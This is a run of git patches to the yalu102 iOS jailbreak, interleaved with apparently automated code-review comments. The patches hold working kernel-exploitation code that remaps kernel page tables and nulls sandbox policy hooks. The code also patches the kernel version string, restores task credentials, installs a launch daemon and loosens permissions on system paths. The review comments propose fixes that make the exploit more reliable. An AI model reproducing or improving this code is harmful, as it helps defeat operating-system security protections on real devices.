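Review bot: The new file carries dead declarations across from ViewController.m: the non-static global `char dt[128];` and the macro `IKOT_IOKIT_CONNECT` are defined but never referenced anywhere in the 339 added lines, and `struct not_essers_ipc_object` embeds a roughly fifty-line song-lyrics comment (including slurs) inside the struct body, which has no place in a source file. Deleting `dt`, `IKOT_IOKIT_CONNECT` and the lyrics block leaves the struct as three fields plus `IO_BITS_ACTIVE`, `IKOT_TASK` and `IKOT_CLOCK`, the only constants the method actually uses. The remaining `#define`s mirror kernel constants, so a one-line comment such as `// ipc_object io_bits values, copied from the XNU kernel headers` above them would tell a maintainer where they come from.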
@@ -0,0 +1,43 @@ +// +// YAKernelOffsets.m +// yalu102 +// +// Created by mologie on 29/01/2017. +// + +#import "YAKernelOffsets.h" +#import + +@implementation YAKernelOffsets + ++ (instancetype)offsetsForCurrentDevice { + struct utsname u = { 0 }; + uname(&u); + return [self offsetsForKernelVersion:[NSString stringWithUTF8String:u.version]]; +} + ++ (instancetype)offsetsForKernelVersion:(NSString *)version { + NSString *kernelsPlistFile = [[NSBundle bundleForClass:self.class] pathForResource:@"Kernels" ofType:@"plist"]; + NSDictionary *kernels = [NSDictionary dictionaryWithContentsOfFile:kernelsPlistFile]; + NSDictionary *kernel = kernels[version]; + if (kernel) { + YAKernelOffsets *offsets = [[YAKernelOffsets alloc] init]; + offsets->allproc_offset = [self parseOffset:kernel[@"allproc"]]; + offsets->procoff = 0x360; + offsets->rootvnode_offset = [self parseOffset:kernel[@"rootvnode"]]; + return offsets; + } else { + return nil; + } +} + ++ (uint64_t)parseOffset:(NSString *)offset { + NSScanner* scanner = [NSScanner scannerWithString:offset]; + if ([offset hasPrefix:@"0x"]) + scanner.scanLocation = 2; + uint64_t result = 0; + [scanner scanHexLongLong:&result]; + return result; +} + +@end diff --git a/yalu102/jailbreak.h b/yalu102/jailbreak.h index 0e0f23c..591864a 100644 --- a/yalu102/jailbreak.h +++ b/yalu102/jailbreak.h @@ -4,4 +4,10 @@ #import #import -void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs); +extern mach_port_t tfp0; +extern uint64_t kernbase; +extern uint64_t slide; +extern uint64_t allprocs_offset; +extern uint64_t rootvnode_offset; + +void jailbreak(void); diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index e6844ef..9dd61ed 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -10,7 +10,6 @@ #import #import #import -#import #import #import #import 
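Review bot: `offsetsForKernelVersion:` never checks that the plist entry contains usable values: `parseOffset:` returns 0 whenever `kernel[@"allproc"]` or `kernel[@"rootvnode"]` is missing, not a string, or malformed (`scanHexLongLong:` fails and `result` stays 0), and a `YAKernelOffsets` with zero offsets is then returned as if the kernel were supported. The method should return nil unless both keys parse, and `parseOffset:` should report failure instead of folding it into 0; the manual `scanner.scanLocation = 2` is also unnecessary because `scanHexLongLong:` already accepts an optional `0x` prefix. `procoff` is the only offset hard-coded (`0x360`) while the other two come from Kernels.plist; if it really is constant across every supported kernel a comment should say so, otherwise it belongs in the plist as well. A possible shape for the two methods:

```objc
+ (instancetype)offsetsForKernelVersion:(NSString *)version {
    // … unchanged: locate and load Kernels.plist …
    NSDictionary *kernel = kernels[version];
    if (![kernel isKindOfClass:[NSDictionary class]]) {
        return nil;
    }
    uint64_t allproc = 0, rootvnode = 0;
    // Reject an entry with a missing or unparseable offset instead of
    // silently handing back 0 — a typo in the plist must not reach the caller.
    if (![self parseOffset:kernel[@"allproc"] into:&allproc] ||
        ![self parseOffset:kernel[@"rootvnode"] into:&rootvnode]) {
        NSLog(@"Kernels.plist entry for %@ is incomplete", version);
        return nil;
    }
    YAKernelOffsets *offsets = [[YAKernelOffsets alloc] init];
    offsets->allproc_offset = allproc;
    offsets->procoff = 0x360;
    offsets->rootvnode_offset = rootvnode;
    return offsets;
}

+ (BOOL)parseOffset:(id)offset into:(uint64_t *)result {
    if (![offset isKindOfClass:[NSString class]]) {
        return NO;
    }
    // scanHexLongLong: already accepts an optional 0x/0X prefix.
    NSScanner *scanner = [NSScanner scannerWithString:offset];
    return [scanner scanHexLongLong:result] && [scanner isAtEnd];
}
```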
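Review bot: Replacing `exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs)` with `void jailbreak(void)` plus five `extern` globals moves the function's inputs into mutable global state that nothing validates: `jailbreak()` cannot tell whether the caller populated `tfp0`, `kernbase`, `allprocs_offset` and `rootvnode_offset`, and the jailbreak.m hunks @@ -89 and @@ -97 simply start reading them. The header should say who sets them and when, e.g. `/* Inputs to jailbreak(); the exploit stage must set all five before calling. */`, and `jailbreak()` should open with `assert(tfp0 != MACH_PORT_NULL && kernbase != 0);` in the same way it already asserts `funcconn`.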
@@ -24,15 +23,15 @@ #import "mac_policy.h" #import "patchfinder64.h" #import "csflags.h" +#import "mach_vm.h" -mach_port_t tfp0=0; -uint64_t slide=0; -io_connect_t funcconn=0; +uint64_t slide; +mach_port_t tfp0; +uint64_t kernbase; +uint64_t allprocs_offset; +uint64_t rootvnode_offset; -kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); -kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); -kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); -kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags); +io_connect_t funcconn=0; uint32_t FuncAnywhere32(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2) { @@ -89,7 +88,7 @@ uint64_t WriteAnywhere32(uint64_t addr, uint32_t val) { #import "pte_stuff.h" -void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) +void jailbreak(void) { io_iterator_t iterator; IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"), &iterator); @@ -97,13 +96,11 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) funcconn = 0; IOServiceOpen(servicex, mach_task_self(), 0, &funcconn); assert(funcconn); - - tfp0 = pt; - + uint64_t bsd_task=0; uint64_t launchd_task = 0; { - uint64_t proc = ReadAnywhere64(allprocs+kernbase); + uint64_t proc = ReadAnywhere64(allprocs_offset+kernbase); NSLog(@"found procs at %llx", proc); while (proc) { uint32_t pid = ReadAnywhere32(proc+0x10); @@ -667,7 +664,6 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) { // mount patch - extern uint64_t rootvnode_offset; uint64_t rootfs_vnode = ReadAnywhere64(rootvnode_offset + kernbase); struct utsname uts; 
diff --git a/yalu102/mach_vm.h b/yalu102/mach_vm.h new file mode 100644 index 0000000..301a23a --- /dev/null +++ b/yalu102/mach_vm.h @@ -0,0 +1,9 @@ + +#pragma once + +#include + +kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); +kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); +kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); +kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags); From b4d9e18f340e2ea98a72c47f72a6c755e6c6c041 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 16:47:35 +0100 Subject: [PATCH 14/34] Cosmetics --- yalu102/jailbreak.m | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 9dd61ed..4571588 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -483,7 +483,7 @@ void jailbreak(void) TTE_SET(tte, TTE_BLOCK_ATTR_UXN_MASK, 0);\ TTE_SET(tte, TTE_BLOCK_ATTR_PXN_MASK, 0);\ WriteAnywhere64(tte_addr, tte);\ - NSLog(@"level %llx - %llx", tte_addr, TTE_GET(tte, TTE_PHYS_VALUE_MASK));\ + NSLog(@"level %llx - %llx", tte_addr, TTE_GET(tte, TTE_PHYS_VALUE_MASK));\ }, level1_table, isvad ? 1 : 2); level1_table = physp - gPhysBase + gVirtBase; @@ -747,7 +747,7 @@ void jailbreak(void) } { NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"reload"]; - char* jl = [jlaunchctl UTF8String]; + const char* jl = [jlaunchctl UTF8String]; unlink("/usr/libexec/reload"); copyfile(jl, "/usr/libexec/reload", 0, COPYFILE_ALL); chmod("/usr/libexec/reload", 0755); 
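Review bot: The four hand-written `mach_vm_*` prototypes carry no comment saying where they were copied from or why a system header is not used, so a maintainer cannot tell whether they are still meant to match the kernel's MIG-generated signatures. Presumably the file exists because the corresponding `<mach/mach_vm.h>` is not available in the SDK being built against; a header comment such as `// Prototypes for the mach_vm MIG routines, which the SDK does not declare; keep in sync with <mach/mach_vm.h> in the macOS SDK.` would record that, and the `#include` on the fourth line should be checked to pull in the header that defines `vm_map_t`, `mach_vm_address_t` and `mach_vm_size_t`.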
@@ -756,7 +756,7 @@ void jailbreak(void) } { NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"0.reload.plist"]; - char* jl = [jlaunchctl UTF8String]; + const char* jl = [jlaunchctl UTF8String]; unlink("/Library/LaunchDaemons/0.reload.plist"); copyfile(jl, "/Library/LaunchDaemons/0.reload.plist", 0, COPYFILE_ALL); chmod("/Library/LaunchDaemons/0.reload.plist", 0644); @@ -773,6 +773,7 @@ void jailbreak(void) chmod("/private/var/mobile/Library/Preferences", 0777); system("(echo 'really jailbroken'; /bin/launchctl load /Library/LaunchDaemons/0.reload.plist)&"); + WriteAnywhere64(bsd_task+0x100, orig_cred); sleep(2); From 8e75885ceecbc612fd9e68ade9bf697c21240fe6 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 16:47:43 +0100 Subject: [PATCH 15/34] =?UTF-8?q?Don=E2=80=99t=20make=20tar=20world-writab?= =?UTF-8?q?le?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- yalu102/jailbreak.m | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 4571588..5ef90c5 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -711,7 +711,7 @@ void jailbreak(void) unlink("/bin/launchctl"); copyfile(jl, "/bin/tar", 0, COPYFILE_ALL); - chmod("/bin/tar", 0777); + chmod("/bin/tar", 0755); jl="/bin/tar"; // chdir("/"); From 45def2bbaa60804fab1a0017758d689043b3b2fc Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 16:47:56 +0100 Subject: [PATCH 16/34] Fix app installation --- yalu102.xcodeproj/project.pbxproj | 2 -- 1 file changed, 2 deletions(-) diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index 4c3622e..f41c659 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj 
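Review bot: `WriteAnywhere64(bsd_task+0x100, orig_cred);` in the @@ -773 hunk is a behavioural change landed under a commit titled "Cosmetics" next to two `const char*` fixes; it deserves its own commit with a message saying what it restores. The line also has no comment, and neither `bsd_task` nor `orig_cred` is declared in this hunk, so the intent has to be reconstructed from elsewhere in `jailbreak()`; a note such as `// restore the credentials saved earlier` (if that is what `orig_cred` holds) would help the next reader. `0x100` is another unnamed struct offset, while the rest of this patch series is moving such values into `YAKernelOffsets`; a named constant would keep that consistent. `jailbreak()` begins and ends outside this hunk.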
@@ -7,7 +7,6 @@ objects = { /* Begin PBXBuildFile section */ - A70DFA9E1E3D332500769FE9 /* include in Resources */ = {isa = PBXBuildFile; fileRef = A70DFA9D1E3D332500769FE9 /* include */; }; A70DFAA11E3D35AC00769FE9 /* Kernels.plist in Resources */ = {isa = PBXBuildFile; fileRef = A70DFAA01E3D35AC00769FE9 /* Kernels.plist */; }; A70DFAAB1E3E35C200769FE9 /* YAKernelOffsets.m in Sources */ = {isa = PBXBuildFile; fileRef = A70DFAAA1E3E35C200769FE9 /* YAKernelOffsets.m */; }; A70DFAAF1E3E3B8900769FE9 /* YAExploitTFP0.m in Sources */ = {isa = PBXBuildFile; fileRef = A70DFAAE1E3E3B8900769FE9 /* YAExploitTFP0.m */; }; @@ -216,7 +215,6 @@ EA9900F61E1E9F060056FEBD /* LaunchScreen.storyboard in Resources */, A70DFAA11E3D35AC00769FE9 /* Kernels.plist in Resources */, EA1A3BAD1E399006009CA025 /* reload in Resources */, - A70DFA9E1E3D332500769FE9 /* include in Resources */, EA1A3BC51E39D1FF009CA025 /* Assets.xcassets in Resources */, EA9900F11E1E9F060056FEBD /* Main.storyboard in Resources */, ); From 44697cfb6780db248c1cd31c7b2bf6baea0350ba Mon Sep 17 00:00:00 2001 From: qwertyoruiop Date: Sun, 29 Jan 2017 16:41:22 +0100 Subject: [PATCH 17/34] hit that blunt # Conflicts: # yalu102/jailbreak.m --- yalu102/jailbreak.m | 38 ++++++++++++++++++++++++++++++-------- 1 file changed, 30 insertions(+), 8 deletions(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 5ef90c5..625ec3d 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -461,7 +461,7 @@ void jailbreak(void) #define PMK (PSZ-1) -#define RemapPage(address) \ +#define RemapPage_(address) \ pagestuff_64((address) & (~PMK), ^(vm_address_t tte_addr, int addr) {\ uint64_t tte = ReadAnywhere64(tte_addr);\ if (!(TTE_GET(tte, TTE_IS_TABLE_MASK))) {\ 
@@ -485,11 +485,31 @@ void jailbreak(void)
 WriteAnywhere64(tte_addr, tte);\
 NSLog(@"level %llx - %llx", tte_addr, TTE_GET(tte, TTE_PHYS_VALUE_MASK));\
 }, level1_table, isvad ? 1 : 2);
+
+#define NewPointer(origptr) (((origptr) & PMK) | findphys_real(origptr) - gPhysBase + gVirtBase)
+
+ uint64_t* remappage = calloc(512, 8);
+
+ int remapcnt = 0;
+
+
+#define RemapPage(x)\
+ {\
+ int fail = 0;\
+ for (int i = 0; i < remapcnt; i++) {\
+ if (remappage[i] == (x & (~PMK))) {\
+ fail = 1;\
+ }\
+ }\
+ if (fail == 0) {\
+ RemapPage_(x);\
+ remappage[remapcnt++] = (x & (~PMK));\
+ }\
+ }
 level1_table = physp - gPhysBase + gVirtBase;
 WriteAnywhere64(ReadAnywhere64(pmap_store), level1_table);
-#define NewPointer(origptr) (((origptr) & PMK) | findphys_real(origptr) - gPhysBase + gVirtBase)
 uint64_t shtramp = kernbase + mh_kern->sizeofcmds + sizeof(struct mach_header_64);
 RemapPage(gadget_base + cpacr_idx*4);
@@ -598,13 +618,15 @@ void jailbreak(void)
 */
 uint64_t sbops = find_sbops();
- uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops);
-
- uint64_t nopag = sbops_end - sbops;
-
- for (int i = 0; i < nopag; i+= PSZ) {
- RemapPage(((sbops + i) & (~PMK)));
+ uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops) + PMK;
+
+ uint64_t nopag = (sbops_end - sbops)/(PSZ);
+
+ int ctr = 0;
+ for (int i = 0; i < nopag; i++) {
+ RemapPage(((sbops + i*(PSZ)) & (~PMK)));
 }
+
 WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_file_check_mmap)), 0);
 WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename)), 0);
 WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename)), 0);
From a0443c653acb4d178b8fa206e6242bc6f5dfccff Mon Sep 17 00:00:00 2001
From: qwertyoruiop
Date: Sun, 29 Jan 2017 16:55:24 +0100
Subject: [PATCH 18/34] hit that blunt
---
 yalu102/jailbreak.m | 9 +++++++--
 1 file changed, 7 insertions(+), 2 deletions(-)
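Review bot: `remappage[remapcnt++] = (x & (~PMK));` in the new `RemapPage` macro stores into a fixed 512-entry buffer with no bound check, and the `calloc(512, 8)` result is never tested, so the 513th distinct page (or an allocation failure) becomes an out-of-bounds write into the heap of the process doing kernel writes. Guard the store, `if (remapcnt >= 512) { NSLog(@"remappage list full, skipping %llx", (uint64_t)(x)); } else { RemapPage_(x); remappage[remapcnt++] = (x & (~PMK)); }`, and put the capacity in one named constant used by both the `calloc` and the check. The macro also uses its parameter unparenthesized (`x & (~PMK)`) and `calloc(512, 8)` reads better as `calloc(REMAP_MAX, sizeof *remappage)`. `jailbreak()` continues on both sides of the hunk.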
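Review bot: `nopag = (sizeof(struct mac_policy_ops) + PMK) / PSZ` is the page count of a page-aligned object, but `sbops` is not necessarily page-aligned, so a struct that starts late in a page spans one page more than this loop remaps and the following `NewPointer(...)` writes to its tail land on a page that was never remapped. Derive the count from the aligned first and last byte instead: `uint64_t first = sbops & ~PMK; uint64_t last = (sbops + sizeof(struct mac_policy_ops) - 1) & ~PMK; uint64_t nopag = (last - first) / PSZ + 1;`. `int ctr` is introduced and never used, and the signed `int i` is compared against the `uint64_t nopag`. The two identical `mpo_vnode_check_rename` writes at the end are pre-existing but look as if one of them was meant for a different hook; worth a check while this code is being touched.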
diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m
index 625ec3d..04b81be 100644
--- a/yalu102/jailbreak.m
+++ b/yalu102/jailbreak.m
@@ -502,7 +502,8 @@ void jailbreak(void)
 }\
 }\
 if (fail == 0) {\
- RemapPage_(x);\
+RemapPage_(x);\
+RemapPage_(x+PSZ);\
 remappage[remapcnt++] = (x & (~PMK));\
 }\
 }
@@ -531,7 +532,11 @@ void jailbreak(void)
 RemapPage(kernvers+whole_base-4);
 WriteAnywhere32(NewPointer(kernvers+whole_base-4), 1);
- copyout(NewPointer(release+whole_base), "MarijuanARM", 11); /* marijuanarm */
+
+ RemapPage(release+whole_base);
+ if (NewPointer(release+whole_base) == (NewPointer(release+whole_base+11) - 11)) {
+ copyout(NewPointer(release+whole_base), "MarijuanARM", 11); /* marijuanarm */
+ }
 uint64_t memcmp_got = find_amfi_memcmpstub();
 uint64_t ret1 = find_ret_0();
From 6f3743db6c49fbf18f23903eef7344de15972dea Mon Sep 17 00:00:00 2001
From: Oliver Kuckertz
Date: Sun, 29 Jan 2017 17:19:09 +0100
Subject: [PATCH 19/34] Add printing uname result to log
---
 yalu102/YAKernelOffsets.m | 5 +++++
 1 file changed, 5 insertions(+)
diff --git a/yalu102/YAKernelOffsets.m b/yalu102/YAKernelOffsets.m
index dc430cb..95dd969 100644
--- a/yalu102/YAKernelOffsets.m
+++ b/yalu102/YAKernelOffsets.m
@@ -13,6 +13,11 @@ @implementation YAKernelOffsets
 + (instancetype)offsetsForCurrentDevice {
 struct utsname u = { 0 };
 uname(&u);
+ printf("sysname: %s\n", u.sysname);
+ printf("nodename: %s\n", u.nodename);
+ printf("release: %s\n", u.release);
+ printf("version: %s\n", u.version);
+ printf("machine: %s\n", u.machine);
 return [self offsetsForKernelVersion:[NSString stringWithUTF8String:u.version]];
 }
From 3890496af207367277edd9b88cb986a1043589f5 Mon Sep 17 00:00:00 2001
From: Oliver Kuckertz
Date: Sun, 29 Jan 2017 17:19:13 +0100
Subject: [PATCH 20/34] Cosmetics
---
 yalu102/ViewController.h | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/yalu102/ViewController.h b/yalu102/ViewController.h
index 80fe105..1cee99c 100644
--- a/yalu102/ViewController.h
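Review bot: The dedupe list still records only `x & ~PMK` even though the macro now also calls `RemapPage_(x+PSZ)`, so a later `RemapPage(x+PSZ)` matches no entry and `RemapPage_` is run a second time on a page that was already swapped, which is exactly what the list was introduced to prevent. Record the second page as well, `remappage[remapcnt++] = ((x + PSZ) & (~PMK));`, and keep the capacity check in step with two entries per call. The two added `RemapPage_` lines also dropped the indentation of the surrounding macro body. The macro definition starts outside the hunk.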
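Review bot: When `NewPointer(release+whole_base) == NewPointer(release+whole_base+11) - 11` is false the `copyout` of `MarijuanARM` is skipped silently, yet ViewController's `strstr(u.version, "MarijuanARM")` check relies on that marker to report an already-jailbroken device, so the app would offer to run again without any trace of why. Add an `else` that logs it, `else { NSLog(@"release string not contiguous after remap; marker not written"); }`, and consider surfacing the condition to the caller. The literal `11` appears three times; `sizeof("MarijuanARM") - 1` ties it to the string it measures. The enclosing function continues outside the hunk.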
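Review bot: The five added `printf` calls go to stdout, whereas the rest of the project reports through `NSLog` (the `jailbreak()` configuration lines in the next patch, for instance), so these values will be absent from the device log where the others appear. Switch them to one entry, `NSLog(@"uname: %s %s %s %s %s", u.sysname, u.nodename, u.release, u.version, u.machine);`, or one `NSLog` per field. `uname(&u)` can fail and its return is not checked before the fields are printed or `u.version` is handed to `stringWithUTF8String:`. The method body is fully visible in the hunk.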
+++ b/yalu102/ViewController.h
@@ -8,10 +8,10 @@
 #import
-@interface ViewController : UIViewController
-{
- IBOutlet UIButton* dope;
+@interface ViewController : UIViewController {
+ IBOutlet UIButton *dope;
 }
+
 - (IBAction)yolo:(id)sender;
 @end
From 0f056d28868438e093e9121926dff32b87d5826c Mon Sep 17 00:00:00 2001
From: Oliver Kuckertz
Date: Sun, 29 Jan 2017 17:19:27 +0100
Subject: [PATCH 21/34] Add printing jailbreak() config to log
---
 yalu102/jailbreak.m | 7 +++++++
 1 file changed, 7 insertions(+)
diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m
index 04b81be..6390051 100644
--- a/yalu102/jailbreak.m
+++ b/yalu102/jailbreak.m
@@ -90,6 +90,13 @@ uint64_t WriteAnywhere32(uint64_t addr, uint32_t val) {
 void jailbreak(void)
 {
+ NSLog(@"jailbreaking using:");
+ NSLog(@"tfp0 = %x", tfp0);
+ NSLog(@"kernbase = %llx", kernbase);
+ NSLog(@"slide = %llx", slide);
+ NSLog(@"allprocs_offset = %llx", allprocs_offset);
+ NSLog(@"rootvnode_offset = %llx", rootvnode_offset);
+
 io_iterator_t iterator;
 IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"), &iterator);
 io_object_t servicex = IOIteratorNext(iterator);
From 7c50bdf4b7bc0829c81378e94331905815ab42d7 Mon Sep 17 00:00:00 2001
From: Oliver Kuckertz
Date: Sun, 29 Jan 2017 17:19:42 +0100
Subject: [PATCH 22/34] Add pte_stuff.h to Xcode project
---
 yalu102.xcodeproj/project.pbxproj | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj
index f41c659..480d597 100644
--- a/yalu102.xcodeproj/project.pbxproj
+++ b/yalu102.xcodeproj/project.pbxproj
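Review bot: The new `NSLog` lines write `kernbase` and `slide` (the KASLR offset) together with the task port name into the system log, which is retained in log archives and sysdiagnose bundles and is readable beyond this process, so the values outlive the run and undo the randomization for anything else that can read the log. Keep the config dump under a debug build, wrapping the six lines in `#ifdef DEBUG` / `#endif`, or log only the per-kernel offsets (`allprocs_offset`, `rootvnode_offset`), which carry no runtime secret. `%x` for `tfp0` assumes `mach_port_t` is an `unsigned int`; `%u` states that intent. The enclosing `jailbreak()` continues outside the hunk.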
@@ -39,6 +39,7 @@ A70DFAAE1E3E3B8900769FE9 /* YAExploitTFP0.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = YAExploitTFP0.m; sourceTree = ""; }; A72023711E3CFBCA00FADBFF /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = System/Library/Frameworks/IOKit.framework; sourceTree = SDKROOT; }; A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */ = {isa = PBXFileReference; lastKnownFileType = text.xcconfig; path = yalu102.xcconfig; sourceTree = ""; }; + A766FD8B1E3E499A002A75CE /* pte_stuff.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = pte_stuff.h; sourceTree = ""; }; EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = ""; }; EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = patchfinder64.o; sourceTree = ""; }; EA1A3BA61E398E33009CA025 /* 0.reload.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = 0.reload.plist; sourceTree = ""; }; @@ -128,6 +129,7 @@ A70DFAAC1E3E389100769FE9 /* mach_vm.h */, EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */, EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */, + A766FD8B1E3E499A002A75CE /* pte_stuff.h */, EA9900EC1E1E9F060056FEBD /* ViewController.h */, EA9900ED1E1E9F060056FEBD /* ViewController.m */, A70DFA9C1E3D314F00769FE9 /* jailbreak.h */, From 75a17baab0ce483d4d40dd1777202157d1c51384 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 17:41:19 +0100 Subject: [PATCH 23/34] Cosmetics --- yalu102/jailbreak.m | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 6390051..b7486b8 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m 
@@ -633,8 +633,7 @@ void jailbreak(void)
 uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops) + PMK;
 uint64_t nopag = (sbops_end - sbops)/(PSZ);
-
- int ctr = 0;
+
 for (int i = 0; i < nopag; i++) {
 RemapPage(((sbops + i*(PSZ)) & (~PMK)));
 }
From 6e1f1c71e9ab5c7224b3fdd1723d00508dd781f0 Mon Sep 17 00:00:00 2001
From: Oliver Kuckertz
Date: Sun, 29 Jan 2017 17:42:14 +0100
Subject: [PATCH 24/34] Fix vm_address_t size regression
---
 yalu102/mach_vm.h | 3 +++
 1 file changed, 3 insertions(+)
diff --git a/yalu102/mach_vm.h b/yalu102/mach_vm.h
index 301a23a..14fcd99 100644
--- a/yalu102/mach_vm.h
+++ b/yalu102/mach_vm.h
@@ -3,6 +3,9 @@
 #include
+// evil hackfix: makes vm_address_t 64-bit
+#define vm_address_t mach_vm_address_t
+
 kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
 kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
 kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection);
From 89f35a1492c56e1fe694d04450c6ad2614b93c68 Mon Sep 17 00:00:00 2001
From: Oliver Kuckertz
Date: Sun, 29 Jan 2017 18:16:50 +0100
Subject: [PATCH 25/34] Create softwareupdated launchd plist backup
---
 yalu102/jailbreak.m | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m
index b7486b8..e29de8f 100644
--- a/yalu102/jailbreak.m
+++ b/yalu102/jailbreak.m
@@ -796,7 +796,8 @@ void jailbreak(void)
 chown("/Library/LaunchDaemons/0.reload.plist", 0, 0);
 }
- //unlink("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist");
+ rename("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist",
+ "/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist.bak");
 }
 }
 chmod("/private", 0777);
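Review bot: `#define vm_address_t mach_vm_address_t` turns a system typedef into a macro for every translation unit that includes `mach_vm.h`, and it rewrites every declaration parsed after it, including any system header included later, not just the project's own code. On the armv7 build (`ARCHS = armv7` in the project file) the two types differ in width, so a library prototype taking `vm_address_t` that is seen after this header now disagrees with the ABI the binary links against, and the mismatch is silent. A project-local alias avoids that: `typedef mach_vm_address_t kaddr_t;` used for kernel addresses in `pte_stuff.h` and `jailbreak.m`; if the macro has to stay, keep it below every system include and list the call sites it exists for in the comment. The `// evil hackfix` comment is honest but should also say why the 64-bit width is required.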
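Review bot: The result of `rename(...softwareupdated.plist, ....bak)` is ignored, so a failure (the plist already moved by a previous run, a read-only `/System`, or EPERM) goes unnoticed and whatever the rename was meant to disable stays in place. Check it and log, `if (rename(src, dst) != 0) { NSLog(@"softwareupdated backup failed: %s", strerror(errno)); }`, with `src`/`dst` standing for the two literals. Since both paths are now spelled out in full, a pair of `static const char *` names would keep them in one place. The enclosing block continues outside the hunk.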
